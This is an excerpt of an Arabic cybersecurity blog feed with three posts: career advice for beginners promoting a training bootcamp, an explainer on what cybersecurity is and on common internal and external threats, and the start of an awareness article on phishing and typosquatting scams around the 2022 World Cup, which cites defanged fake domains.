&lt;p&gt;في كثير من الحالات، يمكن أن يكون امتلاك خلفية غير تقنية ميزة في الأمن السيبراني حيث تقدم تجارب ووجهات نظر فريدة قد نحتاجها بالفعل في هذا المجال&lt;/p&gt;
&lt;h2 id=&quot;الاعتقاد-الخاطئ&quot;&gt;الاعتقاد الخاطئ&lt;/h2&gt;
&lt;p&gt;يعتقد الكثير من الأشخاص أن الأمن السيبراني يدور حول اختراق الأجهزة أو كسر الحماية المطبقة و لكن بالحقيقة فإن الأمن السيبراني يساعد في حماية كل من التكنولوجيا والأشخاص و مفتاح نجاحك في هذا المجال قد لا يكون الخلفية التقنية وممكن أن يكون رغبتك في تعلم كيفية عمل التكنولوجيا وعدم التوقف عن التعلم أبداً&lt;/p&gt;
&lt;p&gt;هناك عدد متزايد من المجالات في الأمن السيبراني التي لا تركز على حل المشاكل التقنية وبدلاً من ذلك فهي تركز على المشاكل البشرية وقد تتطلب هذه الأمور مهارات غير تقنية مثل تطوير السياسات وبرامج الوعي الأمني والتدريب والحوكمة والخصوصية أو القوانين أو الجوانب الأخلاقية&lt;/p&gt;
&lt;h2 id=&quot;كيف-أبدأ-في-مجال-الأمن-السيبراني&quot;&gt;كيف أبدأ في مجال الأمن السيبراني&lt;/h2&gt;
&lt;p&gt;في العديد من الأمور يمكن أن يتم تشبيه الأمن السيبراني بالهندسة أو الرعاية الصحية، يوجد العديد من المسارات المختلفة التي يمكنك التخصص بها، بدءاً من التحليل الجنائي الرقمي للأجهزة المحمولة إلى الاستجابة للحوادث إلى اختبار الاختراق إلى حماية أجهزة العقد النهائية أو حتى تطوير برامج التوعية الأمنية&lt;/p&gt;
&lt;p&gt;لقد أنشأت المبادرة الوطنية لوظائف ودراسات الأمن السيبراني &lt;a href=&quot;https://niccs.cisa.gov/workforce-development/nice-framework&quot;&gt;دليلاً&lt;/a&gt; لجميع الوظائف والفرص المختلفة في الأمن السيبراني، إذا كنت مهتماً بالتعرف على المجالات والتخصصات المختلفة فهذا المكان هو الأفضل للبدء بذلك&lt;/p&gt;
&lt;p&gt;لا تقلق بشأن المسار الذي يجب أن تسلكه، في البداية امنح نفسك وقتاً لفهم التقنيات والمجالات المختلفة ومع مرور الوقت ستوجه اهتماماتك للمجال الذي يلبي شغفك وطموحك&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;في البداية أنصحك بأن تلقي نظرة عامة على الأساسيات:&lt;/strong&gt;&lt;/p&gt;
&lt;h2 id=&quot;أساسيات-شبكات-الحاسب&quot;&gt;أساسيات شبكات الحاسب&lt;/h2&gt;
&lt;p&gt;يمكن تعريف شبكة الحاسب على أنها مجموعة من الأجهزة التي تتواصل مع بعضها البعض وقادرة على مشاركة البيانات والمصادر المختلفة&lt;/p&gt;
&lt;p&gt;تعلم كيفية عمل الشبكات والأمور الأساسية الخاصة بها كالطبقات السبعة OSI Model وبرتوكولات الشبكة الأساسية وأنظمة العنونة بالإضافة لآلية عمل أجهزة الشبكة كالسويتش والراوتر والتي تعتبر مهارة لا تقدر بثمن وتعتبر حجر الأساس لأي عمل في هذا المجال&lt;/p&gt;
&lt;p&gt;تشمل المهارات الأخرى التقاط وتحليل حركة البيانات عبر الشبكة واكتشاف المشاكل والأخطاء أو الهجمات من خلال تحليل حركة البيانات&lt;/p&gt;
&lt;p&gt;إليك وبشكل مجاني كتاب “&lt;a href=&quot;https://books.cyberpedia.site/product/network-ops/&quot;&gt;الدليل الشامل لأساسيات الشبكات بمجال الأمن السيبراني&lt;/a&gt;“&lt;/p&gt;
&lt;h2 id=&quot;أنظمة-التشغيل&quot;&gt;أنظمة التشغيل&lt;/h2&gt;
&lt;p&gt;تعلم أساسيات أنظمة التشغيل، أكثر أنظمة التشغيل شيوعاً هما Linux and Windows بشكل عام معظم الأشخاص لديهم المعرفة الأساسية للتعامل مع أنظمة الويندوز لذا أنصحك بالبدء باستخدام نظام لينكس أولاً وتعلم كيفية إدارة هذه الأنظمة باستخدام سطر الأوامر (CLI) بدلاً من واجهة المستخدم الرسومية (GUI)&lt;/p&gt;
&lt;p&gt;يعد تعلم كيفية إدارة أنظمة لينكس من خلال سطر الأوامر مهارة قوية جداً و ستساعدك بغض النظر عن المسار الذي سوف تسلكه&lt;/p&gt;
&lt;h2 id=&quot;أساسيات-الحماية&quot;&gt;أساسيات الحماية&lt;/h2&gt;
&lt;p&gt;من المهم أن تتعرف على الأمور الأساسية في الحماية وأن تدرك المصطلحات الأساسية وأن تكون قادر على فهم ما هي الثغرات وما هي الأساليب المتبعة في الهجمات والتعرف على أنظمة وأجهزة الحماية المختلفة&lt;/p&gt;
&lt;h2 id=&quot;أساسيات-الويب&quot;&gt;أساسيات الويب&lt;/h2&gt;
&lt;p&gt;من المهم جداً أن تفهم كيف تعمل مواقع الانترنت وكيف تتم عملية الاتصال بين متصفحك وبين سيرفر الويب ولهذا الأمر يجب أن تتعرف على الأمور الأساسية في الويب وآلية عمل البرتوكول HTTP وطريقة عمل سيرفرات الويب والأمور الأخرى المتعلقة بها&lt;/p&gt;
&lt;h2 id=&quot;البرمجة&quot;&gt;البرمجة&lt;/h2&gt;
&lt;p&gt;اكتشف واطلع على الأمور الأساسية في البرمجة&lt;/p&gt;
&lt;p&gt;البرمجة هي كتابة الأكواد التي يتم من خلالها بناء أنظمة التشغيل والتطبيقات التي تعمل على أجهزة الكمبيوتر والأجهزة المحمولة وتطبيقات ومواقع الويب&lt;/p&gt;
&lt;p&gt;يتم كتابة هذه الأكواد من قبل المبرمج (غالباً ما يطلق عليه اسم المطور developer)&lt;/p&gt;
&lt;p&gt;أنصحك أن تبدأ أولاً بلغات بسيطة مثل لغة البايثون Python أو أن تبدأ بالأمور الخاصة بتطوير مواقع الويب مثل HTML and CSS و لغة البرمجة جافا سكريبت Javascript وإذا اكتشفت أنك تستمتع بهذا الأمر فيمكنك الانتقال إلى لغات وأطر عمل أكثر تقدماً&lt;/p&gt;
&lt;p&gt;هذا الأمر لا يحتاج إلى دورات ضمن مراكز تدريبية ويمكنك البدء عبر الإنترنت، يوجد عدد كبير من الدورات والكتب باللغة العربية مخصصة للمبتدئين و كل ما تحتاجه هو جهاز كمبيوتر وبعض الإرشادات ويمكنك البدء بأساسيات البرمجة على الفور&lt;/p&gt;
&lt;h2 id=&quot;من-أين-أبدأ-في-مجال-الأمن-السيبراني&quot;&gt;من أين أبدأ في مجال الأمن السيبراني&lt;/h2&gt;
&lt;p&gt;إليك أسرع طريقة لتكتسب كل المهارات السابقة والمزيد وهي &lt;a href=&quot;https://platform.cyberpedia.site/courses/cyber-security-bootcamp-6/&quot;&gt;معسكر الأمن السيبراني&lt;/a&gt; والذي يعتبر المعسكر الأقوى على مستوى الوطن العربي&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;كل ما تحتاجه لتلبية متطلبات سوق العمل في مجال الأمن السيبراني، في معسكر احترافي واحد&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;ماذا ستتعلم في هذا المعسكر؟&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;الشبكات من وجهة نظر الأمن السيبراني – فهم البنية التحتية وكيفية تأمينها.&lt;/li&gt;
&lt;li&gt;أنظمة التشغيل والحوسبة السحابية – أساسيات لا غنى عنها لأي مختص.&lt;/li&gt;
&lt;li&gt;أساسيات الأمن السيبراني – القواعد الأساسية للحماية من المخاطر.&lt;/li&gt;
&lt;li&gt;مهارات الفريق الأحمر – كيف تفكر بعقلية المهاجم.&lt;/li&gt;
&lt;li&gt;مهارات الفريق الأزرق – الدفاع عن الأنظمة ضد الهجمات.&lt;/li&gt;
&lt;li&gt;المهارات غير التقنية – لأن النجاح لا يعتمد على المهارات التقنية فقط!&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;والجديد كلياً:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;حماية إنترنت الأشياء (IoT Security)&lt;/li&gt;
&lt;li&gt;أساسيات GRC – الحوكمة وإدارة المخاطر والامتثال لمعايير الأمن السيبراني العالمية&lt;/li&gt;
&lt;li&gt;الذكاء الاصطناعي والأمن السيبراني&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote&gt;
&lt;p&gt;للمزيد من التفاصيل تواصل معنا عبر الفيسبوك “&lt;a href=&quot;https://facebook.com/jameeltawelh&quot;&gt;المهندس جميل حسين طويله&lt;/a&gt;“&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id=&quot;في-النهاية&quot;&gt;في النهاية&lt;/h2&gt;
&lt;p&gt;إن كنت مهتماً بالبدء في مجال الأمن السيبراني فلا تدع تعليمك أو خلفيتك الغير تقنية تحد من مسار حياتك المهنية أو تحد من خياراتك وطموحك، بغض النظر عن خلفيتك العلمية فأنت بالتأكيد سوف تجلب وتضيف أمور فريدة وخاصة لهذا المجال&lt;/p&gt;
&lt;p&gt;طالما لديك الشغف والرغبة في التعلم فأنت على الطريق الصحيح، لا تفقد هذا الشغف وبمجرد أن تبدأ في تطوير مهارتك سوف تأتي الفرص لذا ثق بنفسك وابدأ خطوتك الأولى&lt;/p&gt;
</content:encoded><category>المسار المهني والشهادات</category><category>الأمن السيبراني</category><category>المسار المهني</category><category>تعلم الأمن السيبراني</category><category>أساسيات الشبكات</category><category>لينكس</category></item><item><title>ما هو الأمن السيبراني</title><link>https://blog.cyberpedia.site/what-is-cyber-security/</link><guid isPermaLink="true">https://blog.cyberpedia.site/what-is-cyber-security/</guid><description>تعريف الأمن السيبراني وأهميته لحماية بياناتك الشخصية وبيانات الشركات، والفرق بين التهديدات الداخلية والخارجية، والمهارات اللازمة للبدء في هذا المجال.</description><pubDate>Sun, 27 Nov 2022 19:04:24 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;الأمن السيبراني هو كل الإجراءات والتدابير المتخذة لحماية الشبكات والبيانات المتبادلة عبرها من الاستخدام غير المصرح به أو السيئ، على مستوى الأفراد والشركات والدول. تواجه الشركات تهديدات داخلية من موظفين بقصد أو دون قصد، وخارجية مثل استغلال الثغرات والهندسة الاجتماعية ومنع الخدمة والبرمجيات الخبيثة. يتطلب العمل فيه مهارات تقنية وأخرى غير تقنية.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;أصبحت شبكة الانترنت جزءاً أساسياً من حياتنا اليومية ويعتمد عمل العديد من المؤسسات الحكومية والطبية والمالية والتعليمية على هذه الشبكة والتي تعمل من خلال جمع المعلومات الرقمية ومعالجتها وتخزينها ومشاركتها لذلك أصبحت حماية هذه المعلومات (الأمن السيبراني) أكثر أهمية لأمننا القومي واستقرارنا الاقتصادي.&lt;/p&gt;
&lt;h2 id=&quot;تعريف-الأمن-السيبراني&quot;&gt;تعريف الأمن السيبراني&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;يمكن تعريف الأمن السيبراني على أنه كل الإجراءات والتدابير المتخذة لحماية هذه الشبكات والبيانات المتبادلة عبرها من الاستخدام الغير مصرح به أو الاستخدام السيء لها&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;وهذا الأمر يجب أن يتم على المستوى الشخصي كحماية هويتك وبياناتك وأجهزتك عبر شبكة الانترنت وعلى مستوى الشركات كحماية سمعة الشركة وبياناتها ومعلومات عملائها و على مستوى الدول كحماية الأمن القومي وسلامة المواطنين.&lt;/p&gt;
&lt;p&gt;عندما كنت طفلاً هل كنت تتمنى أن تكون مدافعاً عن الكون تمتلك مهارات مذهلة وتكتشف المخاطر وتحمي الأبرياء وتبحث عن الأشرار وتقدمهم للعدالة؟&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;هل تعلم أنك تستطيع أن تحصل على عمل يحقق لك كل هذه الأمنيات؟&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;خبير الأمن السيبراني&lt;/li&gt;
&lt;li&gt;التحليل الجنائي الرقمي&lt;/li&gt;
&lt;li&gt;خبير أمن المعلومات&lt;/li&gt;
&lt;li&gt;هاكر أخلاقي&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;كل هذه الأدوار يمكن أن تكون جزءاً من عملك في مجال الأمن السيبراني المثير والمتغير باستمرار&lt;/p&gt;
&lt;p&gt;نظراً لأن المنظمات والحكومات في جميع أنحاء العالم معرضة بشكل متزايد للتهديدات السيبرانية ومع ازدياد حوادث الاختراق وتسريب المعلومات يزداد الطلب بشكل يومي على المختصين في مجال الأمن السيبراني بالإضافة لوجود طلب متزايد على تدريب الأشخاص في هذا المجال للمساعدة في الدفاع ضد هذا التهديد المتزايد&lt;/p&gt;
&lt;p&gt;الأمن السيبراني هو مجال سريع الخطى وديناميكي للغاية مع مجموعة واسعة من التخصصات الفرعية، مما يتيح لك العمل في أي مكان في العالم تقريباً، مع ميزات وعوائد مالية جيدة وفرص لإحداث فرق حقيقي وملموس&lt;/p&gt;
&lt;p&gt;يعتقد الكثير من الأشخاص أن الأمن السيبراني يدور حول اختراق الأجهزة أو كسر الحماية المطبقة و لكن بالحقيقة فإن الأمن السيبراني يساعد في حماية كل من التكنولوجيا والأشخاص و مفتاح نجاحك في هذا المجال قد لا يكون الخلفية التقنية وممكن أن يكون رغبتك في تعلم كيفية عمل التكنولوجيا وعدم التوقف عن التعلم أبداً&lt;/p&gt;
&lt;p&gt;هناك عدد متزايد من المجالات في الأمن السيبراني التي لا تركز على حل المشكلات التقنية وبدلاً من ذلك فهي تركز على المشاكل البشرية وقد تتطلب هذه الأمور مهارات غير تقنية مثل تطوير السياسات وبرامج الوعي الأمني والتدريب والحوكمة والخصوصية أو القوانين أو الجوانب الأخلاقية&lt;/p&gt;
&lt;p&gt;في العديد من الأمور يمكن أن يتم تشبيه الأمن السيبراني بالهندسة أو الرعاية الصحية، يوجد العديد من المسارات المختلفة التي يمكنك التخصص بها، بدءاً من التحليل الجنائي الرقمي للأجهزة المحمولة إلى الاستجابة للحوادث إلى اختبار الاختراق إلى حماية أجهزة العقد النهائية أو حتى تطوير برامج التوعية الأمنية&lt;/p&gt;
&lt;h2 id=&quot;لماذا-الأمن-السيبراني&quot;&gt;لماذا الأمن السيبراني؟&lt;/h2&gt;
&lt;p&gt;لمعرفة أهمية الأمن السيبراني دعنا نتعرف على أهمية البيانات والتهديدات الأمنية الرقمية على المستوى الشخصي وعلى مستوى الشركات&lt;/p&gt;
&lt;h3 id=&quot;بياناتك-على-شبكة-الانترنت&quot;&gt;بياناتك على شبكة الانترنت&lt;/h3&gt;
&lt;p&gt;يمكن اعتبارها أي معلومات خاصة بك يتم نشرها أو تبادلها عبر شبكة الانترنت وتتضمن الصور والرسائل التي تتبادلها مع عائلتك وأصدقائك عبر برامج المحادثة الفورية أو التي تقوم بنشرها عبر مواقع التواصل الاجتماعي بالإضافة لأي معلومات أخرى مثل الاسم ورقم الضمان الاجتماعي وتاريخ ومكان الميلاد والمعلومات الطبية والتعليمية والمالية ومعلومات العمل وأي نوع من المعلومات الأخرى الخاصة بك والموجودة على شبكة الانترنت&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;ونظراً لأهمية هذه المعلومات يجب أن تسأل نفسك الاسئلة التالية:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;ما هي القوانين التي تحمي خصوصيتك وبياناتك، أين توجد هذه البيانات ومن يمكنه الاطلاع عليها؟&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;معلوماتك الصحية يتم تسجيلها ضمن السجلات الصحية في المشافي والعيادات&lt;/li&gt;
&lt;li&gt;الفواتير والمعلومات المالية يمكن أن يتم مشاركتها مع شركات التأمين&lt;/li&gt;
&lt;li&gt;معلومات الشراء يمكن أن يتم الاحتفاظ بها من قبل المتاجر لإنشاء ملف خاص بك كزبون أو يمكن استخدامها لأغراض أخرى&lt;/li&gt;
&lt;li&gt;عندما تقوم بمشاركة صورك عبر الإنترنت في مواقع التواصل الاجتماعي هل تقوم بتحديد من يمكنه مشاهدتها هل تعرف من يمكنه الوصول ورؤية هذه الصور ونسخها أو تحميلها&lt;/li&gt;
&lt;li&gt;الأجهزة الخاصة بك لا تقوم فقط بتخزين بياناتك بل هي بوابة تؤدي للوصول إلى بياناتك وتوليد معلومات عنك.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;إذا كنت ترغب في الحصول على نسخة رقمية من آخر كشف لبطاقة الائتمان فأنت تستخدم جهاز الحاسب أو الموبايل للوصول إلى موقع الويب الخاص بهذه الخدمة و إذا كنت ترغب في دفع فاتورة خاصة بك عبر شبكة الإنترنت فيمكنك الوصول إلى موقع البنك الخاص بك لتحويل الأموال باستخدام أحد أجهزتك (الحاسب أو الموبايل)&lt;/p&gt;
&lt;p&gt;بالإضافة إلى السماح لك بالوصول إلى معلوماتك يمكن لأجهزتك أيضاً إنشاء معلومات عنك.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;مع توفر كل هذه المعلومات عنك على شبكة الإنترنت، أصبحت بياناتك الشخصية متاحة للمهاجمين الذين يسعون للحصول على:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;بيانات الاعتماد الخاصة بك كمعلومات تسجيل الدخول والتي إذا تمكنوا من الحصول عليها سيكون لديهم إمكانية الوصول إلى حساباتك&lt;/li&gt;
&lt;li&gt;يمكنهم أيضاً الاستفادة من علاقاتك من خلال الوصول إلى حساباتك على الإنترنت وطلب الأموال من أصدقائك أو أفراد عائلتك&lt;/li&gt;
&lt;li&gt;المجرمين مبدعون للغاية فهم لا يسرقون أموالك فقط بل يمكنهم أيضاً سرقة هويتك الرقمية وتدمير حياتك&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id=&quot;التهديدات-الأمنية-الرقمية-على-الشركات&quot;&gt;التهديدات الأمنية الرقمية على الشركات&lt;/h3&gt;
&lt;p&gt;يمكن أن يتم تنفيذ الهجمات من داخل المنظمة أو من خارجها&lt;/p&gt;
&lt;h3 id=&quot;التهديدات-الأمنية-الداخلية&quot;&gt;التهديدات الأمنية الداخلية&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;يمكن لمستخدم داخلي موظف مثلاً أن يكون مصدر للتهديد وهذا الأمر ممكن أن يتم بشكل مقصود أو غير مقصود:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;سوء التعامل مع البيانات السرية&lt;/li&gt;
&lt;li&gt;تهديد عمليات السيرفرات أو الأجهزة الداخلية أو أجهزة البنية التحتية للشبكة&lt;/li&gt;
&lt;li&gt;تسهيل الهجمات الخارجية عن طريق توصيل USB تحوي نوع من البرمجيات الخبيثة يسمح للجهات الخارجية باختراق أنظمة الشركة&lt;/li&gt;
&lt;li&gt;إصابة جهازه بدون علمه ببرمجيات خبيثة تسمح لجهة خارجية بالوصول لشبكة الشركة الداخلية&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;يمكن أن تتسبب التهديدات الداخلية في أضرار أكبر من التهديدات الخارجية، لأن المستخدمين الداخليين لديهم إمكانية الوصول المباشر إلى المبنى وأجهزته الأساسية&lt;/p&gt;
&lt;p&gt;يمتلك الموظفون أيضاً معرفة بشبكة الشركة ومواردها وبياناتها السرية&lt;/p&gt;
&lt;h3 id=&quot;التهديدات-الأمنية-الخارجية&quot;&gt;التهديدات الأمنية الخارجية&lt;/h3&gt;
&lt;p&gt;يمكن أن يكون مصدر التهديدات الخارجية هم الهواة أو الأشخاص المحترفين&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;التالي بعض هذه التهديدات:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;استغلال الثغرات الأمنية ونقاط الضعف في الشبكة أو في أجهزة وسيرفرات الشركة&lt;/li&gt;
&lt;li&gt;هجمات الهندسة الاجتماعية&lt;/li&gt;
&lt;li&gt;هجمات منع الخدمة&lt;/li&gt;
&lt;li&gt;البرمجيات الخبيثة (الفيروسات وبرامج الفدية)&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;كيف-أبدأ-في-مجال-الأمن-السيبراني&quot;&gt;&lt;a href=&quot;https://blog.cyberpedia.site/how-to-start-in-cyber-security/&quot;&gt;كيف أبدأ في مجال الأمن السيبراني&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;للعمل في مجال الأمن السيبراني يجب أن تمتلك مهارات تقنية كالمعرفة الجيدة في آلية عمل الانترنت والشبكات وأنظمة التشغيل ولغات البرمجة وخوارزميات التشفير بالإضافة لبعض المهارات الغير تقنية لتتمكن من التعامل مع هجمات الهندسة الاجتماعية وفهم السلوك البشري ومهارات التواصل لتتمكن من التواصل الفعال مع العملاء أو زملائك في فريق العمل&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;يمكنك التعرف بشكل أكبر على الأمن السيبراني من خلال هذه &lt;a href=&quot;https://platform.cyberpedia.site/course/cyber-security/&quot;&gt;الدورة المجانية&lt;/a&gt; – طريقة &lt;a href=&quot;https://m.youtube.com/shorts/wfXKorpAjmg?feature=share&quot;&gt;التسجيل&lt;/a&gt; بالمنصة&lt;/li&gt;
&lt;li&gt;يمكنك اكتساب كل المهارات التقنية المطلوبة للعمل في هذا المجال من خلال هذه &lt;a href=&quot;https://platform.cyberpedia.site/course/cyber-ops/&quot;&gt;الدورة&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;يمكن التعرف على المهارات الغير تقنية المطلوبة للعمل في هذا المجال من خلال هذه &lt;a href=&quot;https://platform.cyberpedia.site/course/critical-thinking-in-cyber-security/&quot;&gt;الدورة&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;للمزيد من المصادر والنصائح يمكنكم متابعة صفحة &lt;a href=&quot;https://facebook.com/jameeltawelh&quot;&gt;المهندس جميل حسين طويله&lt;/a&gt; على الفيسبوك&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;في-النهاية&quot;&gt;في النهاية&lt;/h2&gt;
&lt;p&gt;إن كنت مهتماً بالبدء في مجال الأمن السيبراني فلا تدع تعليمك أو خلفيتك الغير تقنية تحد من مسار حياتك المهنية أو تحد من خياراتك وطموحك، بغض النظر عن خلفيتك العلمية فأنت بالتأكيد سوف تجلب وتضيف أمور فريدة وخاصة لهذا المجال&lt;/p&gt;
&lt;p&gt;طالما لديك الشغف والرغبة في التعلم فأنت على الطريق الصحيح، لا تفقد هذا الشغف وبمجرد أن تبدأ في تطوير مهارتك سوف تأتي الفرص لذا ثق بنفسك وابدأ خطوتك الأولى&lt;/p&gt;
</content:encoded><category>الأمن السيبراني</category><category>الأمن السيبراني</category><category>حماية البيانات</category><category>التهديدات الداخلية</category><category>التهديدات الخارجية</category><category>وظائف الأمن السيبراني</category></item><item><title>ارفع راية التسلل لهجمات الأمن السيبراني في كأس العالم قطر 2022</title><link>https://blog.cyberpedia.site/qatar-world-cup-cyber-security/</link><guid isPermaLink="true">https://blog.cyberpedia.site/qatar-world-cup-cyber-security/</guid><description>كيف استغل مجرمو الإنترنت كأس العالم قطر 2022 عبر دومينات وتطبيقات وصفحات تواصل مزورة وهجمات على المنظمين، وما خطوات الحماية التي تمنعهم من الوصول إليك.</description><pubDate>Thu, 17 Nov 2022 17:41:24 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;استغل مجرمو الإنترنت كأس العالم قطر 2022 بانتحال أسماء الدومينات (رصدت دراسة نحو 174 دومين خبيث مثل qatar2022[.]pro) و53 تطبيقاً خبيثاً وصفحات تواصل مزورة تروّج للتسويق الهرمي، إضافة إلى تهديد المنظمين بالفدية ومنع الخدمة. للحماية افحص الروابط حرفاً حرفاً، وفعّل المصادقة الثنائية، وحمّل التطبيقات من المتاجر الرسمية فقط.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;تجذب الأحداث الرياضية مثل كأس العالم – قطر 2022 اهتمام كبير من كل أنحاء العالم، لقد تمت مشاهدة النسخة الأخيرة من البطولة في روسيا من قبل 3.57 مليار مشاهد، أي ما يعادل أكثر من نصف سكان العالم في سن الرابعة وما فوق.&lt;/p&gt;
&lt;p&gt;لسوء الحظ، مشجعو كرة القدم ليسوا هم المتابعون الوحيدون لفرقهم المفضلة، هناك أيضاً مجرمو الانترنت والجهات الفاعلة في مجال التهديدات السيبرانية المزودين بمواردهم وأدواتهم المتطورة ودوافعهم المختلفة لاستغلال هذا الحدث وتنفيذ هجماتهم المختلفة.&lt;/p&gt;
&lt;p&gt;عمليات الاحتيال والخداع يمكن أن تتم بأشكال وطرق مختلفة، على سبيل المثال: غالباً ما يستغل مجرمو الانترنت ذوي الدوافع المالية هذه الأحداث للقيام بعمليات الاحتيال وهجمات الاختراق من خلال استخدام عناوين مواقع URL خبيثة تنتحل أسماء مرتبطة بهذه البطولة على أمل زيادة فرصهم في خداع مستخدمي الإنترنت لتحقيق ربح سريع وغير مشروع وفي الوقت نفسه، قد تستغل الجماعات الناشطة في مجال الاختراق كمية الاهتمام العام الممنوح لمثل هذه الأحداث لزيادة وصول رسالتها بشكل كبير وقد تقرر مجموعات التهديد المستمر المتقدم APT – Advanced Persistent Threat التي ترعاها الدول استهداف الأحداث الرياضية العالمية مثل كأس العالم قطر 2022 لتحقيق أهداف سياسية&lt;/p&gt;
&lt;p&gt;بعبارة مختصرة، تهتم الكثير من الجهات الفاعلة في مجال التهديدات الرقمية بهذا النوع من الأحداث، لذلك من المهم جداً تسليط الضوء وبشكل مبكر على بعض التهديدات الإلكترونية الأكثر شيوعاً بهدف منع حدوثها أو التخفيف من تأثيرها ولهذا السبب قررنا كتابة دليل الحماية هذا لعرض بعض الأمثلة المثيرة للاهتمام حول كيفية استغلال مجرمي الانترنت لكأس العالم قطر 2022 للقيام بنشاط الخبيث عبر الانترنت&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;إليك بعض التقنيات والأساليب المستخدمة من قبل مجرمي الانترنت لاستغلال كأس العالم قطر 2022&lt;/strong&gt;&lt;/p&gt;
&lt;h2 id=&quot;انتحال-أسماء-المواقع-الدومينات&quot;&gt;انتحال أسماء المواقع (الدومينات)&lt;/h2&gt;
&lt;p&gt;يعتبر هذا الأسلوب شائعاً جداً لدى مجرمي الانترنت للقيام بعملياتهم الخبيثة ويتم هذا الأمر من خلال استخدام أسماء مواقع ودومينات مع صفحات منتحلة لتقليد مواقع شرعية لمنظمات أو جهات رسمية وموثوقة واستغلال هذا الأمر للقيام بنشاط خبيث بهدف سرقة المعلومات الحساسة كالمعلومات الشخصية ومعلومات تسجيل الدخول ومعلومات البطاقات البنكية أو من الممكن أن يتم استغلال هذا الأمر لإصابة أجهزة المستخدمين ببرمجيات خبيثة&lt;/p&gt;
&lt;p&gt;لإعداد صفحات الويب المخادعة هذه، عادةً ما يختار المهاجمون ومجرمو الانترنت أسماء دومينات مشابهة لموقع ويب شرعي لخداع المستخدمين للنقر عليه وللقيام بهذا الأمر قد يلجئ منفذو الهجمات إلى تبديل حرف ضمن أسم الدومين مثل &lt;code&gt;goggle[.]com&lt;/code&gt; بدلاً من &lt;code&gt;google[.]com&lt;/code&gt; أو استخدام نفس الاسم مع التلاعب بالاسم العلوي من الدومين TLD – Top Level Domain مثل &lt;code&gt;google[.]info&lt;/code&gt; بدلاً من &lt;code&gt;google[.]com&lt;/code&gt; أو تضمين كلمة ذات صلة مثل &lt;code&gt;google-info[.]com&lt;/code&gt; ولتجنب الاكتشاف والإزالة غالباً ما يتم تسجيل هذه الدومينات لدى شركات مزودة للخدمة تعمل على حماية وإخفاء معلومات صاحب الدومين بهدف التخفي بعيداً عن أعين الجهات الخاصة بتطبيق القانون وملاحقة المجرمين عبر الانترنت&lt;/p&gt;
&lt;p&gt;وفقاً لدراسة حديثة تم اكتشاف وتحديد حوالي 174 اسم دومين خبيث ينتحل صفة صفحات لمواقع رسمية خاصة بكأس العالم قطر 2022 وقد تفاوت مستوى التطور الذي يستخدمه المهاجمون لتقليد المواقع الأصلية بشكل كبير، بدءاً من صفحات التصيد الاحتيالي منخفضة الجودة والواضحة إلى الجهود الأكثر دقة لمحاكاة الصور المتحركة والشعارات. من بين هذه المواقع المزورة &lt;code&gt;qatar2022[.]pro&lt;/code&gt; حيث اعتمد المهاجمون على تغيير اسم الدومين العلوي ليكون .pro بدلاً من .qa (الموقع الرسمي لكأس العالم قطر 2022) بهدف خداع المستخدمين لتنفيذ هجمات الاحتيال أو الاختراق&lt;/p&gt;
&lt;p&gt;لتدرك مدى خطورة هذا الأمر إليك صورة هذا الموقع المخادع&lt;/p&gt;
&lt;p&gt;&lt;img alt=&quot;موقع مخادع على دومين منتحل بامتداد pro يقلد الموقع الرسمي للبطولة، ومربع المحادثة في زاويته يوجّه المستخدم إلى دومين آخر يسيطر عليه المهاجم&quot; width=&quot;1600&quot; height=&quot;1197&quot; src=&quot;https://blog.cyberpedia.site/_astro/img-01.D-MX-Coj_1na04R.webp&quot;&gt;&lt;/p&gt;
&lt;p&gt;تم الإبلاغ عن هذا الموقع المخادع على أنه موقع مزور يُستخدم في هجمات التصيد الاحتيالي Phishing Attack وتم منع الوصول له من قبل العديد من مزودي الخدمة&lt;/p&gt;
&lt;p&gt;كما تلاحظ فإن هذا الموقع المخادع ينتحل شخصية الموقع الرسمي بطريقة احترافية وعالية الجودة مع العديد من التفاصيل الدقيقة التي لا تختلف عن الموقع الرسمي ولكن وعند الضغط على مربع المحادثة الموجود في الزاوية السفلية اليمنى يتم توجيه المستخدم إلى عنوان موقع مخادع آخر تحت سيطرة الجهة المنفذة لهذا الهجوم بهدف تنفيذ المزيد من الأعمال الخبيثة الأخرى وبالتأكيد الهدف هنا هو خداع المهتمين بشراء تذاكر حضور المباريات لسرقة معلومات بطاقتهم البنكية ومعلوماتهم الحساسة&lt;/p&gt;
